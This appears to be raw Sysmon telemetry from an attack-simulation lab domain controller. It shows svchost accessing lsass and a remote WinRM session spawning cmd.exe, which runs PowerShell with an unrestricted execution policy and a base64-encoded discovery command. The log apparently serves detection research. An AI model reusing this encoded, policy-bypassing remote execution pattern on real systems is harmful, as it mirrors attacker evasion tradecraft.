15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000597Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000596Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000595Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-1303-000000008701}3856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000594Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000593Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000592Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000591Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7C40-5FA1-1203-000000008701}39084068C:\Windows\system32\cmd.exe{D28789B6-7C40-5FA1-1303-000000008701}3856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000590Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.974{D28789B6-7C40-5FA1-1303-000000008701}3856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-8641-110000000000}0x1141860HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C40-5FA1-1203-000000008701}3908C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000589Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000588Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7C40-5FA1-1103-000000008701}34363044C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-1203-000000008701}3908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000587Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000586Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000584Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000583Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000582Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000581Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000580Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000579Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-1203-000000008701}3908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000578Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000577Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7C40-5FA1-1003-000000008701}45723844C:\Windows\system32\WinrsHost.exe{D28789B6-7C40-5FA1-1203-000000008701}3908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x8000000000000000576Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.968{D28789B6-7C40-5FA1-1203-000000008701}3908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-8641-110000000000}0x1141860HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C40-5FA1-1003-000000008701}4572C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000575Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000574Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.966{D28789B6-7ACF-5FA1-0B00-000000008701}860588C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000573Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 